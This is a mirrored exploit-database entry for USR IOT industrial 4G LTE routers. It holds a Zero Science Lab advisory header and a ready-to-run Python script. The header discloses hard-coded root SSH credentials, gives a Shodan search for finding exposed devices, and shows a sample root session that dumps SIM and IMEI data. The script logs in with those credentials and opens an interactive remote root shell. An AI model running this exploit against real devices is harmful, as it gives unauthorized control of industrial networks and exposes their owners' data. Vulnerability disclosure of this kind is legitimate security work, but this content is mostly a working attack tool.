Share 
## https://sploitus.com/exploit?id=PACKETSTORM:166813
#!/usr/bin/env python3  
#  
#  
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor  
#  
#  
# Vendor: Jinan USR IOT Technology Limited  
# Product web page: https://www.pusr.com | https://www.usriot.com  
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)  
# 1.2.7 (USR-LG220-L)  
#  
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides  
# a solution for users to connect own device to 4G network via WiFi interface  
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which  
# can support 580MHz working frequency and can be widely used in Smart Grid,  
# Smart Home, public bus and Vending machine for data transmission at high  
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,  
# flow control and has many advantages including high reliability, simple  
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,  
# WLAN interface, 4G interface. USR-G806 provides various networking mode  
# to help user establish own network.  
#  
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials  
# within its Linux distribution image. These sets of credentials are never  
# exposed to the end-user and cannot be changed through any normal operation  
# of the device. The 'usr' account with password 'www.usr.cn' has the highest  
# privileges on the device. The password is also the default WLAN password.  
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022  
#  
# -------------------------------------------------------------------------  
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14  
#  
# --Got rewt!  
# # id;id root;pwd  
# uid=0(usr) gid=0(usr)  
# uid=2(root) gid=2(root) groups=2(root)  
# /root  
# # crontab -l  
# */2 * * * * /etc/ltedial  
# */20 * * * * /etc/init.d/Net_4G_Check.sh  
# */15 * * * * /etc/test_log.sh  
# */120 * * * * /etc/pddns/pddns_start.sh start &  
# 44 4 * * * /etc/init.d/sysreboot.sh &  
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;  
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;  
# cat /tmp/usrlte_info  
# Local time is Fri Apr 15 05:38:56 2022  
# (loop)  
# IMEI Number:8*************1  
# Operator information:********Telecom  
# signal intensity:normal(20)  
#  
# Software version number:E*****************G  
# SIM Card CIMI number:4*************7  
# SIM Card number:8******************6  
# Short message service center number:"+8**********1"  
# system information:4G Mode  
# PDP protocol:"IPV4V6"  
# CREG:register  
# Check ME password:READY  
# base station information:"4**D","7*****B"  
# cat /tmp/usrlte_info_imsi  
# 4*************7  
# # exit  
#  
# lqwrm@metalgear:~$   
# -------------------------------------------------------------------------  
#  
# Tested on: GNU/Linux 3.10.14 (mips)  
# OpenWrt/Linaro GCC 4.8-2014.04  
# Ralink SoC MT7628 PCIe RC mode  
# BusyBox v1.22.1  
# uhttpd  
# Lua  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2022-5705  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php  
#  
#  
# 10.04.2022  
#  
  
  
import paramiko as bah  
import sys as baaaaaah  
  
bnr='''  
โ–„โ€ข โ–„โ–Œ.โ–„โ–„ ยท โ–„โ–„โ–„ โ–ช โ–„โ–„โ–„โ–„โ–„   
โ–ˆโ–ชโ–ˆโ–ˆโ–Œโ–โ–ˆ โ–€. โ–€โ–„ โ–ˆยทโ–ˆโ–ˆ โ–ช โ€ขโ–ˆโ–ˆ   
โ–ˆโ–Œโ–โ–ˆโ–Œโ–„โ–€โ–€โ–€โ–ˆโ–„โ–โ–€โ–€โ–„ โ–โ–ˆยท โ–„โ–ˆโ–€โ–„ โ–โ–ˆ.โ–ช   
โ–โ–ˆโ–„โ–ˆโ–Œโ–โ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆโ€ขโ–ˆโ–Œโ–โ–ˆโ–Œโ–โ–ˆโ–Œ.โ–โ–Œ โ–โ–ˆโ–Œยท   
โ–„โ–„โ–„โ–„ยท โ–„โ–„โ–„ยทโ–€ โ–„โ–„ยทโ–€โ–„ โ€ขโ–„ ยทโ–„โ–„โ–„โ–„ โ–€โ–ˆโ–„โ–€โ–ช โ–€โ–€โ–€ โ–„โ–„โ–„   
โ–โ–ˆ โ–€โ–ˆโ–ชโ–โ–ˆ โ–€โ–ˆ โ–โ–ˆ โ–Œโ–ชโ–ˆโ–Œโ–„โ–Œโ–ชโ–ˆโ–ˆโ–ช โ–ˆโ–ˆ โ–ช โ–ช โ–€โ–„ โ–ˆยท  
โ–โ–ˆโ–€โ–€โ–ˆโ–„โ–„โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–ˆ โ–„โ–„โ–โ–€โ–€โ–„ยทโ–โ–ˆยท โ–โ–ˆโ–Œ โ–„โ–ˆโ–€โ–„ โ–„โ–ˆโ–€โ–„ โ–โ–€โ–€โ–„   
โ–ˆโ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆ โ–ชโ–โ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆ.โ–ˆโ–Œโ–ˆโ–ˆ. โ–ˆโ–ˆ โ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ€ขโ–ˆโ–Œ  
ยทโ–€โ–€โ–€โ–€ โ–€ โ–€ โ–„โ–„โ–„โ–€ ยทโ–€ โ–€โ–€โ–€โ–€โ–€โ–€โ€ข โ–„โ–„โ–„โ–„โ–„โ–ช โ–€โ–ˆโ–„โ–€โ–ช.โ–€ โ–€  
โ–€โ–„ โ–ˆยทโ–ช โ–ช โ€ขโ–ˆโ–ˆ   
โ–โ–€โ–€โ–„ โ–„โ–ˆโ–€โ–„ โ–„โ–ˆโ–€โ–„ โ–โ–ˆ.โ–ช   
โ–โ–ˆโ€ขโ–ˆโ–Œโ–โ–ˆโ–Œ.โ–โ–Œโ–โ–ˆโ–Œ.โ–โ–Œ โ–โ–ˆโ–Œยท   
โ–„โ–„โ–„ยทโ–€ โ–„โ–„ยทโ–€โ–ˆโ–„โ–„ยท โ–„โ–„โ–„โ–€..โ–„โ–„โ–€ยท .โ–„โ–„ ยท   
โ–โ–ˆ โ–€โ–ˆ โ–โ–ˆ โ–Œโ–ชโ–โ–ˆ โ–Œโ–ชโ–€โ–„.โ–€ยทโ–โ–ˆ โ–€. โ–โ–ˆ โ–€.   
โ–„โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–ˆ โ–„โ–„โ–ˆโ–ˆ โ–„โ–„โ–โ–€โ–€โ–ชโ–„โ–„โ–€โ–€โ–€โ–ˆโ–„โ–„โ–€โ–€โ–€โ–ˆโ–„   
โ–โ–ˆ โ–ชโ–โ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆโ–ˆโ–ˆโ–Œโ–โ–ˆโ–„โ–„โ–Œโ–โ–ˆโ–„โ–ชโ–โ–ˆโ–โ–ˆโ–„โ–ชโ–โ–ˆ   
โ–€ โ–€ ยทโ–€โ–€โ–€ ยทโ–€โ–€โ–€ โ–€โ–€โ–€ โ–€โ–€โ–€โ–€ โ–€โ–€โ–€โ–€   
'''  
print(bnr)  
  
if len(baaaaaah.argv)<2:  
print('--Gief me an IP.')  
exit(0)  
  
adrs=baaaaaah.argv[1]  
unme='usr'  
pwrd='www.usr.cn'  
  
rsh=bah.SSHClient()  
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())  
try:  
rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.  
print('--Got rewt!')  
except:  
print('--Backdoor removed.')  
exit(-1)  
  
while True:  
cmnd=input('# ')  
if cmnd=='exit':  
rsh.exec_command('exit')  
break  
stdin,stdout,stderr = rsh.exec_command(cmnd)  
print(stdout.read().decode().strip())  
  
rsh.close()